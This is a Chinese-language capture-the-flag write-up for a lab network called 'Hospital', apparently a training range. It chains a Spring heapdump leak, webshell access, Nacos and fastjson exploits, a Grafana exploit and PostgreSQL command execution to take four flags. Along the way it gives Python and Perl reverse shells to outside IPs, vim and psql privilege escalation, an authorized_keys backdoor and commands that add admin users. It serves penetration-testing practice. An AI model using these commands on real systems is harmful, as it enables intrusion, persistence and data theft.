Hospital

开题 39.98.121.23

flag1

fscan扫描

./fscan -h 39.98.121.23

[+] 端口开放 39.98.121.23:22
[+] 端口开放 39.98.121.23:8080
[*] 网站标题 http://39.98.121.23:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://39.98.121.23:8080/login;jsessionid=BD627BA7D464DDFEED3CED6DFACF24BF
[*] 网站标题 http://39.98.121.23:8080/login;jsessionid=BD627BA7D464DDFEED3CED6DFACF24BF 状态码:200 长度:2005   标题:医疗管理后台
[+] [发现漏洞] 目标: http://39.98.121.23:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息: %!s(<nil>)

访问/actuator/heapdump下载到heapdump文件,提取heapdump信息

java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump

image-20250302154302927

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

工具一把梭

image-20250302155007639

蚁剑连接

image-20250302155644834

反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.134.149.24",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

image-20250302155531057

起tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20250302155559543

vim.basic /root/flag/flag01.txt

image-20250302155630984

flag2

vim.basic 提权到root

/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

image-20250302155845265

echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0deVClbB/udXWzT4tMpyEXJBDruxOFCz4algUwd83JjoulRyM6IVZvHxcitsJFCVd2uVNRqNAeH6mFU2zcFne+Awiso3X3AFr8WLFo8X2hlPEa5dJvlJmuAOk5HcUoa8f3YsJhmQ1ev942Vpz6H0h8bwI2EmskI+cBDxGtuU9/2eAEt417esEOyov30UA+1nc2M/rGXDUupVRmYvU8sQQDOzZPifhzbNhsJk+fx7SFR03LoX1sqWAc0bRvuDPs+8fCI4ZARy2PdTdYciut2ePZnY/HWmMxg205qBzVzq3Q+wpCdNlVOr3pzQenn9PHjgyiQ4D0IboORYWkGboUfDUarII8sbOxhOMelGnaNaDjzM73k6TMT827RwhkB6cYIdg9+iOb+ZQv2CVGbT6YIB7WesKlSZssgkthunnyqHx18USm2/XMDd7DRqB9CgdOmCeCfYDh2wljC056JkLRu1ptr8idU/BrnT+ODaD3TNl5hcYrQwV3S4P+e8/gUoVrlc=” > /root/.ssh/authorized_keys

image-20250302161319771

上传venom,fscan

image-20250302161859077

ifconfig

image-20250302161936874

扫内网,搭代理

./fscan -h 172.30.12.5/24

[+] 端口开放 172.30.12.6:8848
[+] 端口开放 172.30.12.236:22
[+] 端口开放 172.30.12.5:22
[+] 端口开放 172.30.12.6:139
[+] 端口开放 172.30.12.6:135
[+] 端口开放 172.30.12.6:445
[+] 端口开放 172.30.12.236:8080
[+] 端口开放 172.30.12.5:8080
[+] 端口开放 172.30.12.236:8009
[*] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=7045AE14140EF41E377989154BC69120
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] 网站标题 http://172.30.12.5:8080/login;jsessionid=7045AE14140EF41E377989154BC69120 状态码:200 长度:2005   标题:医疗管理后台
[*] NetInfo
[*] 172.30.12.6
   [->] Server02
   [->] 172.30.12.6
[*] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[*] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[+] [发现漏洞] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息: %!s(<nil>)

先打nacos,nacos:nacos登录

image-20250302163005652

data-id : db-config

image-20250302163036904

用下面这个工具生成恶意jar包

charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用

修改 AwesomeScriptEngineFactory.java 的内容

Runtime.getRuntime().exec("net user Tsuki pass@123 /add");
Runtime.getRuntime().exec("net localgroup administrators Tsuki /add");

image-20250302163414817

运行这个打包

image-20250302163517977

把这个jar包传到web1的服务器上

然后起一个http服务

image-20250302165256708

image-20250302165247622

然后rdp连接

image-20250302165437623

flag3

直接bp的插件https://github.com/amaz1ngday/fastjson-exp

打fastjsonecho拿flag

image-20250302170547068

留后门,连接

image-20250302170723785

image-20250302170816003

flag4

image-20250302170900374

发现是多网卡,上传fscan和venom

扫描54网段的

./fscan -h 172.30.54.179/24

[+] 端口开放 172.30.54.12:22
[+] 端口开放 172.30.54.179:22
[+] 端口开放 172.30.54.12:5432
[+] 端口开放 172.30.54.12:3000
[+] 端口开放 172.30.54.179:8080
[+] 端口开放 172.30.54.179:8009
[*] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964   标题:医院后台管理平台
[*] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login
[*] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana

./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000

跑出账号密码 postgres:Postgres@123

image-20250302173202782

后需要提权,改个密码

ALTER USER root WITH PASSWORD '123456';

创建命令执行函数

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

select system('perl -e \'use Socket;$i="172.30.54.179";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

image-20250302175020779

弹到shell

起一个交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20250302173933408

sudo -l发现psql可以无密码执行sudo

image-20250302174007226

image-20250302174026626

image-20250302180135972

然后拿到flag

image-20250302180151459